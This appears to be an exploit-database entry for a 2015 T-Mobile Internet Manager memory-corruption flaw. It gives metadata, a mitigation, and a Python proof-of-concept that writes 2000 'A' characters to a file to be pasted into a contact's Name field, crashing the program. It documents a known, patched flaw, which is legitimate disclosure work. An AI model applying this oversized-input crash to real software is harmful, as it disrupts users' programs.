T-Mobile Internet Manager Memory Corruption PoC

vendor:

Internet Manager

by:

SATHISH ARTHAR

7.5

CVSS

HIGH

Memory Corruption

119

CWE

Product Name: Internet Manager

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: WinXp/Windows7/windows8

2015

T-Mobile Internet Manager Memory Corruption PoC

A PoC exploit for T-Mobile Internet Manager Memory Corruption vulnerability. The exploit involves copying the content of CRASH.TXT in create new contacts and pasting it in Name field.

Mitigation:

Update to the latest version of T-Mobile Internet Manager

Source

Exploit-DB raw data:

#!/usr/bin/python
# coding: utf-8
#[+] Author: SATHISH ARTHAR
#[+] Exploit Title: T-Mobile Internet Manager Memory Corruption PoC
#[+] Date: 30-07-2015
#[+] Category: DoS/PoC
#[+] Tested on: WinXp/Windows7/windows8
#[+] Vendor: https://www.t-mobile.de/meinhandy/1,25412,19349-_,00.html
#[+] Download: https://www.t-mobile.de/downloads/neu/winui.zip
#[+] Sites: sathisharthars.wordpress.com
#[+] Twitter: @sathisharthars
#[+] Thanks: offensive security (@offsectraining)




print"###########################################################"
print"# Title: T-Mobile Internet Manager Memory Corruption PoC #"
print"# Author: SATHISH ARTHAR #"
print"# Category: DoS/PoC # "
print"###########################################################"
print"Copy the content of CRASH.TXT in create new contacts and paste
it in Name field"
print" contacts -----> create new -----> Name ----> paste it "


crash= "A" * 2000
filename = "CRASH.TXT"
file = open(filename , "w")
file.write(crash)
print "\n Files Created!\n"
file.close()